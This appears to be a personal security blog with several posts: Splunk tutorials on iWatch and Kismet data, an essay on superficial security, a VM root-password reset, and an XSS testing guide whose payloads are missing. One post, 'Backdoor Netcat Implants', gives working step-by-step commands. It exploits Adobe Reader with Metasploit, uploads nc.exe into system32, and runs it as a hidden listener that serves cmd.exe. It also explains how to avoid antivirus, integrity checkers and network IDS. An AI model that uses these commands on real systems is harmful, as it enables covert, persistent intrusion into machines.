iWatch my logs in Splunk....do you?

iWatch is a program written in perl that performs real-time filesystem monitoring and requires inotify support for Linux-based kernels (Linux Kernel >= 2.6.13).  Its purpose is to monitor changes in a specific directory, file or even recursively monitor a directory and perform event notification immediately after a change.  This program is somewhat similar to the open source versions of Tripwire, OSSEC and AIDE however, it is more simplistic in nature and can easily be tied into your central syslog monitoring solution.

Activity
Configure iWatch to monitor some critical files on a local Ubuntu Linux server and report changes to syslog.  Then configure Splunk (the standard Search App) to monitor the local syslog file and modify syslog-event transformations to display iWatch specific fields.

• It will be assumed that Ubuntu is already installed and operating 
• Local Ubuntu box is configured to have syslog messages forwarded to /var/log/syslog 
• Splunk 4.1.x is already configured and the default Search app is available

Step 1:

1. Download inotify support and iwatch for Ubuntu (I used archive.offensive-security.com as my source repository)

• # apt-get install inotify-tools

• # apt-get install iwatch

Step 2: Configure the local syslog file index in Splunk

• Log into the Splunk Manager web interface Manager --> Data inputs --> Files & Directories --> Add New
  
• Click the Index a file on the Splunk server 
• Use /var/log/syslog as the path
• Select From list as the sourcetype, then select syslog as the source type
  
• Select main as the index, unless you know what you are doing
• Select Follow tail (so Splunk performs a tail -f on the file and reads in new events after you create the index)
• The click Save 

Step 3: Modify the syslog-event transformations file:
In the splunk web interface, now go to Manager --> Fields --> Field transformations --> syslog-extractions
Modify the fields as follows, then click the Save button when completed.

Regular Expression:
\s([^\s\[]+)(?:\[(\d+)\])?:\s(.*?)\s(.*?)\s

Key:

_raw

Event Format:

process::$1 pid::$2 iwatch_event::$3 iwatch_file::$4

Step 4: Start local iWatch process
-s (log events to syslog)
-v (verbose)
-r (recursive monitor directories/files)
-e (monitor all file modifications/changes)

(run in foreground)

# iwatch -s -v -r -e all_events /etc /bin

or
(run in background)
# iwatch -s -v -r -e all_events /etc/bin &


Step 5: create, delete some files  (in bash shell as root)

# cd /etc; i=0; while [ $i -le 10 ]; do touch file.$i; i=`expr $i + 1`; done

# cd /etc; j=0; while [ $j -le 10 ]; do rm file.$j; j=`expr $j + 1`; done

(view contents of sylog and make sure we have some events)

# cat /var/log/syslog

Step 6: Search for the new iWatch events in Splunk
Using the Splunk Search App, search for your new events using the following regex:

sourcetype="syslog" process="iWatch"

You should see "iwatch_event" and "iwatch_file" under the interesting field column on the left.  Click on those fields and search for your specific events.  Now you have the ability to search and build reports on file modifications/changes to your environment!!!  I would recommend reading more on iWatch to see how it can best be configured to work in your environment.  The example above should just get you started.

Happy Spelunking!!!


References
http://iwatch.sourceforge.net/index.html

Cosmetic Security

For some, computer security is an afterthought or a roadblock that lacks a monetary return on investment.  Cosmetic Security is simply an organization's pathetic approach to an impermanent fixture for unforeseen abnormalities or anomalies in their IT security support structure.....its like putting a band-aide on a wound that should be treated with stitches.  If you refuse to proceed with caution, fail to respect the situation, it will eventually spread with infectious diseases and affect other parts of your vital organs.  Likewise, if organization's fail to do their due diligence and take care of issues before they turn into real problems it could eventually have an adverse affect on their overall IT infrastructure.  It is up to security experts to help senior management realize the importance of security and it's overall return on investment.  Otherwise, if management doesn't care than why should any of we?


        

Kismet meets Splunk!!!

Looking for another way to store all that Kismet data you have been populating into your relational databases?  Well look no further.  Splunk can already index CSV formatted data so you are in luck!  For those of you who don't know what Kismet you can find information on the products website at the Kismet official website.  One traditional way of processing, storing and analyzing wireless network traffic has been using Kismet for capturing the packets and GPS data, outputting the data into XML format, then using Kisgearth to covert the GPS data into kml files you can populate into Google earth.  This method is very intuitive and does not require a lot of knowledge or know-how to setup.  However, for those of you who don't need to map out pretty pictures of where open access points are around the globe, try exporting your Kismet data into CSV format then indexing it with Splunk!

Importing the Kismet data
(Instructions assume the person following the steps below are some what familiar with Splunk and using version 4.X of the Splunk software)

1. Use Kismet to collect some network traffic and save the output into a CSV formatted file 
2. Log into the Splunk web interface and go to Manager > Data Inputs 
3. Click Add New under the Actions column for Files and Directories
4. Set the source to be upload a local file
5. Browse to find your kismet CSV file
6. Select the Set sourcetype drop box and select the From list option
7. Select the Select source type from list drop box and select csv as the format for the new input
8. Then select the index you want your new input to be apart of (use main if nothing else), then click the Save button (may take a moment to complete depending on this size of the file you are indexing)
9. I would suggest restarting Splunk then go to your Search app and query your new input data

• regex: sourcetype="csv-2"

You should see all of your semicolon-delimited fields from the CSV file are now indexable fields that have been extracted via Splunk!  Who needs a relational database when you have Splunk, I mean seriously??  If you still want pretty pictures with this data, install the Google-maps Splunk app and map your wireless hotspot location points using google-maps with ip location or your Kismet GPS data....if you want more information on how to set that up, drop me a note and I can help you out!

  Happy Spelunking!!!

BackTrack Hacks - Lost Passwd

Today I had a brain fart (starting to happen more often as I get older) and forgot the 'root' password for my BackTrack 4 virtual machine.  After contemplating a few minutes on how to recover the lost password, I remembered from way back in my old Solaris admin days of using the installation CD to wipe out the original password hash for 'root'.  I decided to give a similar concept a try but rather than using a CD I would be using the original bt4.iso image I used to build my BackTrack 4 virtual machine.  Here is how I did it.....

(Use at your own risk!!!!)

Step-by-step Process:

1. Open up VMware Player then load your backtrack VM you lost the 'root' password for, then start the virtual machine
2. Click inside the VMware Player window and when the virtual machine starts to load, hit your "Esc" key a bunch of times to enter the Boot Menu
3. On the VMware Player menu bar Click "Devices" then "CD/DVD" then "Connect to Disk Image File (.iso)..."
4. The Choose Image window will appear.  Select the original bt4.iso you used to build your VM with.  After your select the .iso image, the window will close.
5. In the Boot Menu window, use your arrow keys and select CD-ROM Drive (this will boot the .iso image that is attached to our virtual CD-ROM) then hit the "Enter" key
6. The default bt4.iso image will boot up and eventually dump you into a root shell prompt (if using final version of bt4)
7.  Create a temporary directory to mount the local hard drive to
• mkdir /a
8. Mount your local hard drive to the new temporary directory
• mount /dev/sda1 /a
9. Now remove the hash value for root in your local hard drives /etc/shadow file
• vi /a/etc/shadow
• Remove the hash contents (should look similar to example below:)
• root:(remove contents between these colons):11111:0:99999:7:::
10. Now unmount /a, disable the .iso boot image, and reboot your system
• umount /a
• Click "Devices" then "CD/DVD" then "Disable Disk Image..."
• sync; init 0
11. Open up VMware Player again, load your bt4 virtual machine and login with root and NO password!
12. That's it!!!

This process should work for most/all versions of back track however, I have only tested this process using BackTrack version 4.2 (Final v4 release).

Backdoor Netcat Implants

Netcat is a useful security/networking tool that has been around since the dawn of the dinosaurs. However, it still holds credibility amongst security professionals even today, probably due to its inherent features and versatile design that make it an effective "swiss army knife" for most computer enthusiasts. Penetration tests some times require the security professional to maintain access to the compromised target even when he looses the original avenue of attack. A network IPS, Firewall, Virus detection defense mechanism could trip after the fact, like when trying to implant a Trojan or Virus as your backdoor. This could cause your Metasploit meterpreter shell to loose connection with its session/target and even create a new policy to block your IP address. After working so hard to get the client side attack to exploit you wouldn't want all of your hard work to go in vein.

Using netcat (or cryptcat) to pop command shells from the compromised target to alternate ports/IP addresses is still an effective way of staying under the radar and maintaining access to the compromised target. For instance, not all anti-virus software will detect the presence of the nc.exe program. Its not to say you couldn't do all of this with Metasploit or some other tool but its cool to use alternative methods and change it up sometimes ;-)

(I don't condone unethical hacking. Use at your own risk!!!)

Example (Objectives):

1. Target Image: Windows XP running vulnerable version of Adobe Reader (7, 8)
2. Attack Image: Whatever you want
   
3. Pop a shell on a windows target using the client-side Metasploit Universal Adobe exploit
4. Upload "nc.exe" to a safe location (maybe some place where a virus scanner wouldn't be running and an integrity checking tool wouldn't be monitoring) on the compromised target and start a netcat/cryptcat listener running the "cmd.exe" command on a common port
   
5. On the attack system, use netcat to connect to the listening port on the compromised system...bam...instant command shell (if you use cryptcat you will have encryption to help evade a network IDS)
6. Perform as many times as necessary, but not too much! Remain stealth!
   

Steps (Modify as necessary. This is just a guide):

• On the attack image launch the metasploit 3.x command console

command: msfconsole

• Use the Adobe Acrobat universal exploit. You can search for it in msfconsole

command: search adobe
command: use exploit name

• You should now be using the exploit name. Set the options for the payload/exploit

command: options
(set all of the values you need)

Example:
command: set LHOST yourip
command: set SRVPORT 80
command: set URIPATH adobe
command: set payload windows/meterpreter/reverse_tcp
command: exploit
(should start http listener on your attack image)

• On your Windows XP target, open a browser window and put in the http://ipaddress/adobe/urlstring to launch the exploit(Adobe should attempt to run the document and hang)
  

• On your attack system see if the exploit ran successfully

command: sessions -i number

(Metasploit will tell you if the exploit was successful and if a session was created with the compromised system. If not...try again or try another exploit/avenue of attack...)

• If all went well you should now be in your new session.

• Now use the meterpreter shell to upload the nc.exe program to the compromised system

• Copy the nc.exe file to the attack system installdirectory/Framework3/msf3 directory. This is where you rmeterpreter shell will attempt to grab the nc.exe program from when you use the upload function

• Now run the upload command in the meterpreter shell to upload nc.exe to the target's system32 directory
  

command: upload -r nc.exe

• Now use meterpreter to execute the nc.exe file and run as a service in the background

command: execute -f "nc.exe -L -p 8080 -d -e cmd.exe"
(The process should be created on the compromised system)

• Use netcat on your attack image to connect to the port hosting the command shell (cmd.exe)

command: nc -v -n targetip 8080

Now you should have another remote back door. Connect as many times as you want and open up as many shells as you need. Then Close out of your meterpreter session, close metasploit.....look....you still have a shell :-)


References:

http://blogs.msdn.com - netcat picture
http://www.ol-service.com/sikurezza/doc/netcat_eng.pdf - netcat command syntax

Create usable indexs in Splunk

So for the past couple of hours I spent some time researching the Splunk website, wiki and forums and have not found an "effective" way of creating a splunk index and pointing one of my inputs/apps to it. So, I took on a little experiment to create my own index in my app but I couldn't get it working. The inputs were going into the index but the app couldn't see the data. I needed to give the app permission to use the new index (Duh!!). If you are using an enterprise license of splunk you would be able to assign permission through the "Users" or "Roles" option in the Splunk manager UI. However, if you are using the FREE version of Splunk you will have to perform the steps below [like I did] in order for your app to work correctly with your new index.

A few simple steps:
1.) create a new index through the Splunk web manager (or copy an already made indexes.conf file in the $SPLUNK_HOME/etc/system/default directory to your APP/local directory and modify accordingly)

2.) Once you have a working (soon to be working) indexes.conf file in your APP/local directory move on to the next step.

3.) modify/create your inputs.conf file in your APP/local/inputs.conf file to explicitly state:
index=[your index name]

something like this......
[udp://9999]
index=custom_index
disable = false
sourcetype = custom_source

3.) modify or create an authorize.conf file in your APP/local directory:

[role_user]
srchIndexesDefault = custom_index

4.) Restart splunk!

Answer to the question I posted on http://answers.splunk.com
http://answers.splunk.com/questions/1149/problem-getting-a-new-index-in-splunk-v4-0-x-to-work-properly


Happy Spelunking!!!

Simple Cross-Site Scripting (XSS) Techniques

Web application testing is essential in today's industry. Whether you work in the commercial, private, government sectors you need to ensure that both your data and your customer's data are protected by emerging and persistent threats. Cross-Site Scripting (XSS) vulnerabilities are caused by lack of proper input validation controls on the server (or the victims browser) for user-supplied input, usually executed through Java Script (once called Live Script). XSS vulnerabilities tend to lead to advanced social engineering attacks facilitated through Phishing scams, session hijacking, cookie theft and the list goes on. These threats are real and in order to protect your precious assets affected by these types of attacks you should employ some basic testing concepts when evaluating the security worthiness of your code. Here are some ways to test if your web application is lacking input validation controls:

( I do not condone unethical hacking. Use at your own risk!!!)

Demonstration
Test if parameters passed through a URL are susceptible to XSS attacks. Substitute my examples below for the web application and URL fields/parameters you are evaluating.

Initial Testing


Now substitute the value of the "user=" parameter with some injected java script

If the "user=" parameter does not supply any input validation from the server and the browser allows the java script injection your web browser will be populated with the web source code from the login.jsp page.

Additional Testing
I have found that a good bit of the XSS demonstrations and examples on the web show you how to execute java script in a vulnerable web parameter/field to display the alert pop up window with some random text. Assuming one of your parameters was vulnerable to the java script injection above in Example 1, lets try popping some alert messages using that same parameter/field, just substitute the value for "user=" with the following:












Varying Results and Considerations
There are many variables to consider when performing these types of tests.

1.)Not all web browsers will produce the same expected output. Microsoft Internet Explorer, Firefox, Safari, and so forth may not respond the same way to these tests. It is important to test the vulnerability in different browsers/versions of browsers to see which are and are not susceptible to the vulnerability.

2.) NoScript (Free Mozilla web browser product plug in) and other preemptive script blocking techniques are ways to mitigate these types of attacks. Enabling these features could alter or vary your expected results. However, these features are essential in protecting your assets against these types of issues.


Sources and Worthy Reading Material

OWASP: XSS Cheat Sheet
http://www.owasp.org/index.ph/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

FireBlog: (Image used at the beginning of post)
http://www.fireblog.com/wp-content/uploads/2009/04/xss-threat3.jpg